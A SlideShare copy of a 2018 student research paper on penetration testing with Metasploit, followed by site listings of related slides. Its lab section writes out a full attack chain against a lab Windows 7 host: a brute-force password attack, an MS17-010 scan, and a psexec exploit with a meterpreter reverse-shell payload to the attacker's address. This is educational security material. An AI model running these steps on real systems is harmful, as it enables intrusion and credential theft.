SlideShare a Scribd company logo
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072
© 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 193
RESEARCH PAPER
A study on Penetration Testing Using Metasploit Framework
Pawan Kesharwani1, Sudhanshu Shekhar Pandey2, Vishal Dixit3, Lokendra Kumar Tiwari4
1,2,3,4Center for Computer Sciences, Ewing Christian College, Prayagraj
---------------------------------------------------------------------***---------------------------------------------------------------------
Abstract - The process of performing a penetration test is to verify that networks and systems are not vulnerable to a security
risk that could allow unauthorized access to resources. This paper will review the steps involved in preparing for and
performing a penetration test. The intended audience for this paper is projectdirectors ormanagerswhomightbeconsidering
having a penetration test performed. The process of performinga penetrationtestiscomplex.Eachcompanymustdetermineif
the process is appropriate for them or not.
Key Words: Security Testing, Vulnerability Assessment, Penetration Testing, Web Application Penetration Testing.
1. INTRODUCTION
Over the last few years, companies have been adding additional functionality to existing applications and implementing new
applications in an effort to provide more convenience or better service for customers and/or employees. Examples of this
functionality could be in the form of World Wide Web access for bank customers or telecommutingoptionsforemployeeswho
work at home. Additionally, companies have also determined that a presence on the World Wide Web is a way to increase
brand awareness and establish a top-of -mind awareness for their product or service for potential customers. Security is a
significant concern for World Wide Web servers. The World Wide Web servers have added a new set of vulnerabilities that
companies should consider. However, vulnerabilities are not limited to World Wide Web servers. Vulnerabilitiesexistandcan
be unintentionally induced in systems or resources that have been in operation for an extended period.
1.1 What Is Penetration Testing?
Penetration testing also called pen testing or ethical hacking is the practice of testing a computer system, network or web
application to find security vulnerabilities that an attacker could exploit. Penetration testing can be automated with software
applications or performed manually. Either way, the process involves gathering information about the target before the test,
identifying possible entry points, attempting to break in -- either virtually or for real -- and reporting back the findings.
1.2 WHY PERFORM A PENETRATION TEST?
If vulnerability is utilized by an unauthorized individual to access company resources, company resources can be
compromised. The objective of a penetration test is to address vulnerabilities before they can be utilized.
2. PHASES IN PENETRATION TESTING:
1) INFORMATION GATHERING: In this phase we shall gather all information related to server like what is correct
domain of web server and how many sub-domains are connectedtothisdomain.Isanyfirewall issetupfor webserver
or not? In our information gathering phase, we have found that web server’s IP - 192.168.43.236. For detection of
firewall we will use the tool WAFW00F (Web Application Firewall Detection Tool).
2) SCANNING: In the scanning phase, we identify that what type of services is running on the web server andwhatisthe
version of that particular service. We also identify that at which port this service is running. We identify that all
services is running on which Operating system. For doing this we mainly use NMAP (Network MAPPER) tool and
METASPLOIT’s AUXILIARY/SCANNER facility.
3) DISCOVER VULNERABILITY: For find vulnerability in web server or any system pentester mainlyuse Nikto,Nessus
or Metasploit’s Auxiliary/scanner facility. In my work I mainly use auxiliary’s Scanner Facility.
4) EXPLOITATION: After find vulnerability, a pentester’s main goal is Breach all type of securityandtakeremoteaccess
of server. For doing this we use METASPLOIT.
5) REPORT GENERATION: In this phase we just generate full report of our Penetration testing process.
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072
© 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 194
3. GATHERING INFORMATION ABOUT SYSTEMS (INVENTORY SCAN)
The Inventory scan process involves obtaining as much information as possible about the system that is targeted for the
penetration test. Information of value: Operating System (including version number) in use, applications and application
versions. With the Operating System and application specific information, only the known vulnerabilities that exist for the
specific Operating System and or application need be tested. This is the distinction between an indiscriminate address space
probe for any open ports (also known as script kiddies) and an actual penetration test.
4. EXPLOITATION OF VULNERABILITIES
The exploitation phase of the penetration test is performed by using a vulnerability scanner to identify problems with the
configuration of a system. There are number of freeware and commercial tools that perform specific functions. The tools
(subset of the tools mentioned include:
A. Nessus –A network vulnerability scanner tool for Unix systems.
B. Firewalk –A traceroute like tool that allows the Access Control Lists of a firewall tobe determinedanda network map
can be created.
C. John the Ripper –John is an active password cracking tool to identify weak password syntax.
D. Crack / Libcrack –A password cracking tool for Unix systems.
5. PROVIDING THE RESULTS OF THE TEST
The results of the test should include solutions to reduce or eliminate the vulnerabilities. This is what differentiates a
penetration test and a security audit. The significant vulnerabilities identified should be addressed first and a schedule
determined to verify that the vulnerabilities have been addressed. The next department, network or system can then be
selected for the same penetration testing process.
The solutions implemented will be dependent on the vulnerabilities identified, the loss to thecompanyifconditionstriggering
the vulnerability occurred, and the cost (and effectiveness) of the available solutions. One solution might require that a new
system running a web server must pass a vulnerability test before the web port is opened at the firewall. Another solution
might require that all mail within the domain is sent to a central mail system and delivered to local host systems bythecentral
mail server. Enforcement of the existing policy might be the only condition required to address certain vulnerabilities.
In the case of desktop security, remote administration software might be already prohibited at the company. But a better job
needs to be done to ensure compliance.
There will also be vulnerabilities that can be addressed by applying the most recent version of the application or operating
system patch. The results of the report should be closely guarded. If the informationfell intothewronghands,anunauthorized
individual could exploit the recently.
6. Test Performed By Team Members
1) INFORMATION GATHERING :
ATTACKER’S IP: 192.168.43.30 (KALI OS)
VICTIM’S IP: 192.168.43.236
Our first work is login on attacking system. While we started information gathering phase, we first gather that what is IP of
victim. Now our second work is that we check that, is any firewall enable on this server or not. We shall do this by using
WAFW00F tool.
After successfully login to attacking system,
We open our terminal and type wafw00f and press enter key.
Here type wafw00f http://192.168.43.236
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072
© 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 195
FIGURE – 1.1
After seeing the output of this work, we easily understand that this server is behind a firewall or any kind of security.
Now I want to know that what admin name of the system and what is password. For do this I shall create wordlist of both
username and password. After creating wordlist, I shall do brute force attack onwebserver.FordoingBruteforce attack ishall
use XHYDRA tool. This is a password cracking tool.
USER NAME LIST:
FIGURE – 1.2
PASSWORD LIST:
FIGURE – 1.3
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072
© 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 196
Now Open APPLICATION > PASSWORD ATTACKS > XHYDRA
Set target IP – 192.168.43.236
Set Username list and Password list in xHydra
FIGURE – 1.5
Now click on start button and as we can see the output.
FIGURE – 1.6
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072
© 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 197
Here after brute-force attack, username is l2s3r and password is l2s3r@l2s3r of server – 192.168.43.236
Now we shall start scanning process where we identify the server O.S, whatservicesisrunningonserverandwhatisversionof
services.
2) SCANNING :
For scanning process we shall use NMAP (network mapper) tool.
NMAP:
NMAP USE:
-sT Scan using TCP connect
-sS Scan using TCP SYN scan (default)
-sU Scan UDP ports
Set ip in NMAP for scanning For detect running O.S, running services use –sS, -sV, -A.
PENETRATION TESTING IN SMB PROTOCOL USING METASPLOIT (PORT 445)
msf > search scanner/smb
FOR DETECT SMB VERSION 1
msf > use auxiliary/scanner/smb/smb1
msf auxiliary(scanner/smb/smb1) > show options
msf auxiliary(scanner/smb/smb1) > set rhosts 192.168.43.236
msf auxiliary(scanner/smb/smb1) > run
After seeing this output we can easily understand that windows 7 support smb version 1
Now we move to our next part which is discovering vulnerability.
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072
© 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 198
3) DISCOVER VULNERABILITY :
For discover vulnerability in server we again use METASPLOIT.
FOR CHECK THAT SMB IS VULNERABLE OR NOT
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > show options
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.43.236
msf auxiliary(scanner/smb/smb_ms17_010) > run
As we can see from output that: Host is likely VULNERABLE to MS17-010.
4) EXPLOITATION:
Multiple ways to Connect Remote PC using SMB Port
msf > use exploit/windows/smb/psexec
msf exploit (windows/smb/psexec) > show options
msf exploit (windows/smb/psexec) > set rhost 192.168.43.236
msf exploit (windows/smb/psexec) > set smbuser l2s3r
msf exploit (windows/smb/psexec) > set smbpass l2s3r@l2s3r
msf exploit (windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit (windows/smb/psexec) > set lhost 192.168.43.30
msf exploit (windows/smb/psexec) > exploit
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072
© 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 199
Once the commands run we shall gain a meterpreter session of your victim’s PC and so we can access it as we want.
Result:
Vulnerability #1 – : scanner/smb/smb_ms17_010 Eternalblue is the exploit used for compromising a windows 7 system. The
windows tools will be running in kali by a window emulator, called wine. The execution of windows tools will be transparent
thanks to exploit code for metasploit released by elevenpaths.
Vulnerability #2- windows/smb/psexec The psexec module is often used by penetration testers to obtain access to a given
system that you already know the credentials for. It waswrittenbySysinternalsandhasbeenintegrated withintheframework.
Often as penetration testers, we successfully gain access to a system through some exploit, use meterpreter to grab the
passwords or other methods like fgdump, pwdump, or cachedump and then use rainbowtables to crack those hash values.
Conclusion:
Penetration testing is a comprehensive method to identify the vulnerabilities in a system. It offers benefits such as prevention
of financial loss; compliance to industry regulators, customers and shareholders; preserving corporate image; proactive
elimination of identified risks. The testers can choose from black box,whitebox,andgrayboxtestingdependingon theamount
of information available to the user. The testers can also choose from internal and external testing, depending on the specific
objectives to be achieved. There are three types of penetration testing: network,applicationandsocial engineering.Thispaper
discussed a three-phase methodology consisting of test preparation, test, and test analysis phase. The test phase is done in
three steps: information gathering, vulnerability analysis, and vulnerability exploit. This phase can be done manuallyorusing
automated tools.
REFERENCES
1. http://nmap.org/ accessed on 05/12/2018.
2. https://searchsoftwarequality.techtarget.com accessed on 5/12/2018.
3. https://www.google.com/ accessed on 5/12/2018.
4. Metasploit -The Penetration Tester’s Guide by David Kennedy,Jim O’Gorman, Devon Kearns.
5. Penetration testing a Hands-on introduction to Hacking San Francisco by Georgia Weidman.
6. McGraw, G. (2006). Software Security: Building Security In, Adison Wesley Professional.
7. https://www.exploit-db.com/ accessed on 05/12/2018.
8. https://www.rapid7.com/ accessed on 05/12/2018.
AUTHORS
Corresponding Author –
Pawan Kesharwani
B.VOC IT-ITeS
Ewing Christian College Prayagraj
Second Author –
Sudhanshu Shekhar Pandey
B.VOC IT-ITeS
Ewing Christian College Prayagraj
Third Author –
Vishal Dixit
B.VOC IT-ITeS
Ewing Christian College Prayagraj
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072
© 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 200
Fourth Author–
Dr. Lokendra Kumar Tiwari
Assitant Professor, B.VOC IT-ITeS
Ewing Christian College Prayagraj
Ad

More Related Content

What's hot (18)

CST 630 RANK Educational Specialist--cst630rank.com
CST 630 RANK Educational Specialist--cst630rank.comCST 630 RANK Educational Specialist--cst630rank.com
CST 630 RANK Educational Specialist--cst630rank.com
VSNaipaul15
 
CST 630 RANK Introduction Education--cst630rank.com
CST 630 RANK Introduction Education--cst630rank.comCST 630 RANK Introduction Education--cst630rank.com
CST 630 RANK Introduction Education--cst630rank.com
agathachristie266
 
CST 630 RANK Become Exceptional--cst630rank.com
CST 630 RANK Become Exceptional--cst630rank.comCST 630 RANK Become Exceptional--cst630rank.com
CST 630 RANK Become Exceptional--cst630rank.com
agathachristie113
 
CST 630 RANK Inspiring Innovation--cst630rank.com
CST 630 RANK Inspiring Innovation--cst630rank.comCST 630 RANK Inspiring Innovation--cst630rank.com
CST 630 RANK Inspiring Innovation--cst630rank.com
KeatonJennings104
 
CST 630 RANK Remember Education--cst630rank.com
CST 630 RANK Remember Education--cst630rank.comCST 630 RANK Remember Education--cst630rank.com
CST 630 RANK Remember Education--cst630rank.com
chrysanthemu49
 
Cst 630 Enhance teaching / snaptutorial.com
Cst 630 Enhance teaching / snaptutorial.comCst 630 Enhance teaching / snaptutorial.com
Cst 630 Enhance teaching / snaptutorial.com
Baileyabw
 
CST 630 RANK Redefined Education--cst630rank.com
CST 630 RANK Redefined Education--cst630rank.comCST 630 RANK Redefined Education--cst630rank.com
CST 630 RANK Redefined Education--cst630rank.com
claric241
 
IRJET- Web Application Firewall: Artificial Intelligence ARC
IRJET-  	  Web Application Firewall: Artificial Intelligence ARCIRJET-  	  Web Application Firewall: Artificial Intelligence ARC
IRJET- Web Application Firewall: Artificial Intelligence ARC
IRJET Journal
 
Accuracy and time_costs_of_web_app_scanners
Accuracy and time_costs_of_web_app_scannersAccuracy and time_costs_of_web_app_scanners
Accuracy and time_costs_of_web_app_scanners
Larry Suto
 
Cst 630 Motivated Minds/newtonhelp.com
Cst 630 Motivated Minds/newtonhelp.comCst 630 Motivated Minds/newtonhelp.com
Cst 630 Motivated Minds/newtonhelp.com
amaranthbeg53
 
Analyzing the Effectivess of Web Application Firewalls
Analyzing the Effectivess of Web Application FirewallsAnalyzing the Effectivess of Web Application Firewalls
Analyzing the Effectivess of Web Application Firewalls
Larry Suto
 
An evaluation of two host based intrusion prevention systems
An evaluation of two host based intrusion prevention systemsAn evaluation of two host based intrusion prevention systems
An evaluation of two host based intrusion prevention systems
UltraUploader
 
A look at current cyberattacks in Ukraine
A look at current cyberattacks in UkraineA look at current cyberattacks in Ukraine
A look at current cyberattacks in Ukraine
Kaspersky
 
A Comparative Study between Vulnerability Assessment and Penetration Testing
A Comparative Study between Vulnerability Assessment and Penetration TestingA Comparative Study between Vulnerability Assessment and Penetration Testing
A Comparative Study between Vulnerability Assessment and Penetration Testing
YogeshIJTSRD
 
How to Choose a SandBox - Gartner
How to Choose a SandBox - GartnerHow to Choose a SandBox - Gartner
How to Choose a SandBox - Gartner
Moti Sagey מוטי שגיא
 
How to expose shortcuts in competitive poc
How to expose shortcuts in competitive pocHow to expose shortcuts in competitive poc
How to expose shortcuts in competitive poc
Moti Sagey מוטי שגיא
 
A Comparison Study of Open Source Penetration Testing Tools
A Comparison Study of Open Source Penetration Testing ToolsA Comparison Study of Open Source Penetration Testing Tools
A Comparison Study of Open Source Penetration Testing Tools
ijtsrd
 
Avc prot 2016a_en
Avc prot 2016a_enAvc prot 2016a_en
Avc prot 2016a_en
Andrey Apuhtin
 
CST 630 RANK Educational Specialist--cst630rank.com
CST 630 RANK Educational Specialist--cst630rank.comCST 630 RANK Educational Specialist--cst630rank.com
CST 630 RANK Educational Specialist--cst630rank.com
VSNaipaul15
 
CST 630 RANK Introduction Education--cst630rank.com
CST 630 RANK Introduction Education--cst630rank.comCST 630 RANK Introduction Education--cst630rank.com
CST 630 RANK Introduction Education--cst630rank.com
agathachristie266
 
CST 630 RANK Become Exceptional--cst630rank.com
CST 630 RANK Become Exceptional--cst630rank.comCST 630 RANK Become Exceptional--cst630rank.com
CST 630 RANK Become Exceptional--cst630rank.com
agathachristie113
 
CST 630 RANK Inspiring Innovation--cst630rank.com
CST 630 RANK Inspiring Innovation--cst630rank.comCST 630 RANK Inspiring Innovation--cst630rank.com
CST 630 RANK Inspiring Innovation--cst630rank.com
KeatonJennings104
 
CST 630 RANK Remember Education--cst630rank.com
CST 630 RANK Remember Education--cst630rank.comCST 630 RANK Remember Education--cst630rank.com
CST 630 RANK Remember Education--cst630rank.com
chrysanthemu49
 
Cst 630 Enhance teaching / snaptutorial.com
Cst 630 Enhance teaching / snaptutorial.comCst 630 Enhance teaching / snaptutorial.com
Cst 630 Enhance teaching / snaptutorial.com
Baileyabw
 
CST 630 RANK Redefined Education--cst630rank.com
CST 630 RANK Redefined Education--cst630rank.comCST 630 RANK Redefined Education--cst630rank.com
CST 630 RANK Redefined Education--cst630rank.com
claric241
 
IRJET- Web Application Firewall: Artificial Intelligence ARC
IRJET-  	  Web Application Firewall: Artificial Intelligence ARCIRJET-  	  Web Application Firewall: Artificial Intelligence ARC
IRJET- Web Application Firewall: Artificial Intelligence ARC
IRJET Journal
 
Accuracy and time_costs_of_web_app_scanners
Accuracy and time_costs_of_web_app_scannersAccuracy and time_costs_of_web_app_scanners
Accuracy and time_costs_of_web_app_scanners
Larry Suto
 
Cst 630 Motivated Minds/newtonhelp.com
Cst 630 Motivated Minds/newtonhelp.comCst 630 Motivated Minds/newtonhelp.com
Cst 630 Motivated Minds/newtonhelp.com
amaranthbeg53
 
Analyzing the Effectivess of Web Application Firewalls
Analyzing the Effectivess of Web Application FirewallsAnalyzing the Effectivess of Web Application Firewalls
Analyzing the Effectivess of Web Application Firewalls
Larry Suto
 
An evaluation of two host based intrusion prevention systems
An evaluation of two host based intrusion prevention systemsAn evaluation of two host based intrusion prevention systems
An evaluation of two host based intrusion prevention systems
UltraUploader
 
A look at current cyberattacks in Ukraine
A look at current cyberattacks in UkraineA look at current cyberattacks in Ukraine
A look at current cyberattacks in Ukraine
Kaspersky
 
A Comparative Study between Vulnerability Assessment and Penetration Testing
A Comparative Study between Vulnerability Assessment and Penetration TestingA Comparative Study between Vulnerability Assessment and Penetration Testing
A Comparative Study between Vulnerability Assessment and Penetration Testing
YogeshIJTSRD
 
A Comparison Study of Open Source Penetration Testing Tools
A Comparison Study of Open Source Penetration Testing ToolsA Comparison Study of Open Source Penetration Testing Tools
A Comparison Study of Open Source Penetration Testing Tools
ijtsrd
 

Similar to Penetration testing using metasploit framework (20)

IRJET- Cross Platform Penetration Testing Suite
IRJET-  	  Cross Platform Penetration Testing SuiteIRJET-  	  Cross Platform Penetration Testing Suite
IRJET- Cross Platform Penetration Testing Suite
IRJET Journal
 
Many companies and agencies conduct IT audits to test and assess the.docx
Many companies and agencies conduct IT audits to test and assess the.docxMany companies and agencies conduct IT audits to test and assess the.docx
Many companies and agencies conduct IT audits to test and assess the.docx
tienboileau
 
Self-Protecting Technology for Web Applications
Self-Protecting Technology for Web ApplicationsSelf-Protecting Technology for Web Applications
Self-Protecting Technology for Web Applications
IRJET Journal
 
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET Journal
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar
 
Cst 630 Education is Power/newtonhelp.com
Cst 630 Education is Power/newtonhelp.comCst 630 Education is Power/newtonhelp.com
Cst 630 Education is Power/newtonhelp.com
amaranthbeg73
 
Cst 630 Extraordinary Success/newtonhelp.com
Cst 630 Extraordinary Success/newtonhelp.comCst 630 Extraordinary Success/newtonhelp.com
Cst 630 Extraordinary Success/newtonhelp.com
amaranthbeg113
 
IRJET- Comparative Study on Network Monitoring Tools
IRJET- Comparative Study on Network Monitoring ToolsIRJET- Comparative Study on Network Monitoring Tools
IRJET- Comparative Study on Network Monitoring Tools
IRJET Journal
 
NSA and PT
NSA and PTNSA and PT
NSA and PT
Rahmat Suhatman
 
Securezy - A Penetration Testing Toolbox
Securezy - A Penetration Testing ToolboxSecurezy - A Penetration Testing Toolbox
Securezy - A Penetration Testing Toolbox
IRJET Journal
 
IRJET- Survey on Phishing Attack Detection and Mitigation
IRJET- Survey on Phishing Attack Detection and MitigationIRJET- Survey on Phishing Attack Detection and Mitigation
IRJET- Survey on Phishing Attack Detection and Mitigation
IRJET Journal
 
Comparative study of Cyber Security Assessment Tools
Comparative study of Cyber Security Assessment ToolsComparative study of Cyber Security Assessment Tools
Comparative study of Cyber Security Assessment Tools
IRJET Journal
 
Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12
Laura Arrigo
 
Phases of Penetration Testing
Phases of Penetration TestingPhases of Penetration Testing
Phases of Penetration Testing
KiwiQA
 
IRJET- Secure Scheme For Cloud-Based Multimedia Content Storage
IRJET-  	  Secure Scheme For Cloud-Based Multimedia Content StorageIRJET-  	  Secure Scheme For Cloud-Based Multimedia Content Storage
IRJET- Secure Scheme For Cloud-Based Multimedia Content Storage
IRJET Journal
 
Vulnerability Management System
Vulnerability Management SystemVulnerability Management System
Vulnerability Management System
IRJET Journal
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
Asep Sopyan
 
IRJET-Managing Security of Systems by Data Collection
IRJET-Managing Security of Systems by Data CollectionIRJET-Managing Security of Systems by Data Collection
IRJET-Managing Security of Systems by Data Collection
IRJET Journal
 
A Study on Vulnerability Management
A Study on Vulnerability ManagementA Study on Vulnerability Management
A Study on Vulnerability Management
IRJET Journal
 
IRJET-A Review of Testing Technology in Web Application System
IRJET-A Review of Testing Technology in Web Application SystemIRJET-A Review of Testing Technology in Web Application System
IRJET-A Review of Testing Technology in Web Application System
IRJET Journal
 
IRJET- Cross Platform Penetration Testing Suite
IRJET-  	  Cross Platform Penetration Testing SuiteIRJET-  	  Cross Platform Penetration Testing Suite
IRJET- Cross Platform Penetration Testing Suite
IRJET Journal
 
Many companies and agencies conduct IT audits to test and assess the.docx
Many companies and agencies conduct IT audits to test and assess the.docxMany companies and agencies conduct IT audits to test and assess the.docx
Many companies and agencies conduct IT audits to test and assess the.docx
tienboileau
 
Self-Protecting Technology for Web Applications
Self-Protecting Technology for Web ApplicationsSelf-Protecting Technology for Web Applications
Self-Protecting Technology for Web Applications
IRJET Journal
 
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET Journal
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar
 
Cst 630 Education is Power/newtonhelp.com
Cst 630 Education is Power/newtonhelp.comCst 630 Education is Power/newtonhelp.com
Cst 630 Education is Power/newtonhelp.com
amaranthbeg73
 
Cst 630 Extraordinary Success/newtonhelp.com
Cst 630 Extraordinary Success/newtonhelp.comCst 630 Extraordinary Success/newtonhelp.com
Cst 630 Extraordinary Success/newtonhelp.com
amaranthbeg113
 
IRJET- Comparative Study on Network Monitoring Tools
IRJET- Comparative Study on Network Monitoring ToolsIRJET- Comparative Study on Network Monitoring Tools
IRJET- Comparative Study on Network Monitoring Tools
IRJET Journal
 
Securezy - A Penetration Testing Toolbox
Securezy - A Penetration Testing ToolboxSecurezy - A Penetration Testing Toolbox
Securezy - A Penetration Testing Toolbox
IRJET Journal
 
IRJET- Survey on Phishing Attack Detection and Mitigation
IRJET- Survey on Phishing Attack Detection and MitigationIRJET- Survey on Phishing Attack Detection and Mitigation
IRJET- Survey on Phishing Attack Detection and Mitigation
IRJET Journal
 
Comparative study of Cyber Security Assessment Tools
Comparative study of Cyber Security Assessment ToolsComparative study of Cyber Security Assessment Tools
Comparative study of Cyber Security Assessment Tools
IRJET Journal
 
Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12
Laura Arrigo
 
Phases of Penetration Testing
Phases of Penetration TestingPhases of Penetration Testing
Phases of Penetration Testing
KiwiQA
 
IRJET- Secure Scheme For Cloud-Based Multimedia Content Storage
IRJET-  	  Secure Scheme For Cloud-Based Multimedia Content StorageIRJET-  	  Secure Scheme For Cloud-Based Multimedia Content Storage
IRJET- Secure Scheme For Cloud-Based Multimedia Content Storage
IRJET Journal
 
Vulnerability Management System
Vulnerability Management SystemVulnerability Management System
Vulnerability Management System
IRJET Journal
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
Asep Sopyan
 
IRJET-Managing Security of Systems by Data Collection
IRJET-Managing Security of Systems by Data CollectionIRJET-Managing Security of Systems by Data Collection
IRJET-Managing Security of Systems by Data Collection
IRJET Journal
 
A Study on Vulnerability Management
A Study on Vulnerability ManagementA Study on Vulnerability Management
A Study on Vulnerability Management
IRJET Journal
 
IRJET-A Review of Testing Technology in Web Application System
IRJET-A Review of Testing Technology in Web Application SystemIRJET-A Review of Testing Technology in Web Application System
IRJET-A Review of Testing Technology in Web Application System
IRJET Journal
 
Ad

Recently uploaded (20)

Generative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in BusinessGenerative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in Business
Dr. Tathagat Varma
 
TrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business ConsultingTrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business Consulting
Trs Labs
 
AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 
Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.
hpbmnnxrvb
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Mobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi ArabiaMobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi Arabia
Steve Jonas
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
SOFTTECHHUB
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep DiveDesigning Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
ScyllaDB
 
Rusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond SparkRusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond Spark
carlyakerly1
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx
Samuele Fogagnolo
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
